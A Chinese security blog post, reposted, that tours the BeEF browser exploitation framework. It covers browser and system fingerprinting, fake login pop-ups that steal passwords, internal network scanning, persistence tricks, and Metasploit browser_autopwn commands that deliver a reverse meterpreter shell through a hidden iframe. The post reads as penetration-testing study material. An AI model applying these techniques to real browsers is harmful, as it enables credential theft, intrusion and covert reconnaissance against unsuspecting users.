beef简单利用

admin 2023年4月20日16:36:15评论61 views字数 2299阅读7分39秒阅读模式

0X00:前言

BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。经过测试以及在公网上的搭建,几个月前的笔记了,今天看见周末老师发了个帝国的文章,想起来我有很多笔记可以发,因此就先放一篇beef的笔记吧。

0x01:跳板

本次公网测试主要利用了xss靶场进行测试。

http://117.167.136.245:10181/Feedback.asp

0x02:相关安装

beef只允许在linux和mac下安装,kali环境(<2019.2)自带,centos6.5安装过程看附件,没有mac环境。

0x03:beef 相关功能

一.信息收集

(一).浏览器信息

收集内容:

浏览器名称版本
浏览器用户版本
插件(包括Java,ActiveX,VBS,Flash……)
窗口大小

收集方法:

(1)默认收集信息:

beef简单利用

(2)利用插件:

beef简单利用

ps:这里面颜色的区别:

模块图标不同颜色对应不同的使用效果
绿色:适用当前浏览器
橙色:适用当前浏览器,但易被用户发现,社工模块默认为橙色
红色:不适于当前浏览器,但是可以尝试
灰色,根本就不能使用

(二).系统信息:

可收集:

安装的软件(适用于IE下,Detect Software模块)
注册表键值(适用于IE下,此时会弹出提示消息)
内网IP(Java模块得到授权)
系统详情(通过JavaApplet获取系统版本、Java VM details、NIC >names and IP、处理器、内存、屏幕显示模式)
定位(通过Google maps)
剪贴板信息(会弹出提示消息)

beef简单利用

beef简单利用

ps:不同的浏览器所能使用的模块不同,本人测试了六合浏览器(手机+pc),不一一列举,放两张对比下。

mac(自带):

beef简单利用

pc(谷歌):

beef简单利用

(三).用户行为:

可收集:

用户是否访问过某URL、domain
是否登录特定网站账号
是否使用TOR

如图:

beef简单利用

二.社会工程

如果使用BeEF控制了浏览器,那么就可以修改整个页面来尝试社会工程学

获取登录信息

如果当他正在挂着facebook,这时候你弹个facebook的登录框,如果他单纯的话,账户信息就过来了

具体流程:

攻击执行

beef简单利用

客户点击:

beef简单利用

密码盗取:

beef简单利用

同样的还有其他模块也能造成在这种:

beef简单利用

再有社工类的其他模块大概思路就是:
劫持(跳转到新的页面),诱导(诱导点击或者下载),重定向(钓鱼,下载重定向等)

直接放相关模块截图:

beef简单利用

beef简单利用

三,网络扫描

通过JavaScript,可以尝试利用浏览器扫描内网

1.获取内网ip

Get Internal IP WebRTC模块:

通过WebRTC获取内网IP

Get Internal IP模块:

通过Java Socket class获取内网IP

beef简单利用

2.识别局域网

识别内网网关,如图

beef简单利用

3.识别HTTP Servers

识别内网web servers

4.ping操作

调用ping命令扫描内网

Ping Sweep模块 Ping Sweep (Java)模块

如图

beef简单利用

5.跨域扫描

beef简单利用

6、DNS枚举

beef简单利用

7.端口扫描

Port Scanner模块

beef简单利用

beef简单利用

8.网络指纹特征扫描

用来扫描内网中的Web服务器和网络设备

Fingerprint Network模块

如图

beef简单利用

9、远程 CSRFs

10、IRC NAT Pinning

模拟浏览器的IRC通信,可用来绕过防火墙

10.网络拓扑

BeEF可根据扫描获得的信息绘制内网网络拓扑 如图

beef简单利用

beef简单利用

beef简单利用

四.结合Metasploit

(一)Metasploit系列模块

beef简单利用

(二)Browser Autopwn

反弹回meterpreter

方法:

1.使用Metasploit的Browser Autopwn功能生成BrowserAutoPwn URL

use auxiliary/server/browser_autopwn
show options
set LHOST 192.168.16.245
set SRVHOST 192.168.16.245
set SRVPORT 8881
run -z

生成链接:

beef简单利用

2.使用”Create Invisible Iframe”模块加载autopwn页面

beef简单利用

3.等待弹回shell

sessions -l

beef简单利用

五.Tunneling

代理功能

方法:

1.选择控制的浏览器

beef简单利用

2、浏览器代理设置

HTTP Proxy:127.0.0.1

Port:6789

beef简单利用

六.XSS

beef简单利用

七.维持权限

1、Create Pop Under模块

创建一个新窗口,如图

beef简单利用

被拦截了,我们看下效果吧

beef简单利用

但是我们勾选上单机事件就能进行绕过:

beef简单利用

beef简单利用

按理论来说,应该会在增加一个在线浏览器,但是并没有增加

2、Confirm Close Tab模块

当用户关闭当前页面时,反复弹出确认是否关闭页面的消息

3、Create Foreground iFrame模块

修改当前页面所有链接来避免离开当前页面

比如用户点击某个连接,会将新页面显示在当前页面上面,注意的是网址不会发生改变,以自带的测试页面举例,如图:

beef简单利用

beef简单利用

4、Man In The Browser模块

可拦截修改页面内所有链接,当用户点击当前页面的任意链接后仍可维持权限(必须是同源的页面)
如果用户手动更改URL地址栏,无法维持权限

八.安卓界面的测试

经测试可以在android上使用的模块:

1、弹框
2、重定向
3、查看是否访问过某些网站
4、Creates an invisible iframe
5、社工系列
6、msf系列
7、NetWork系列,可以用来扫描同一内网下的windows主机

最后

在我用公网测试到这里的时候。。。不知道为啥我的链接不能用了,怎么都获取不到session了,就很迷,本来是打算继续测试下朋友圈的。。因此就这样吧,下一篇写个实战的,pyq钓个鱼(有剧本的合法的)

来源:https://bbs.zkaq.cn/t/4578.html

原文始发于微信公众号(白帽子左一):beef简单利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月20日16:36:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   beef简单利用http://cn-sec.com/archives/1682414.html

发表评论

匿名网友 填写信息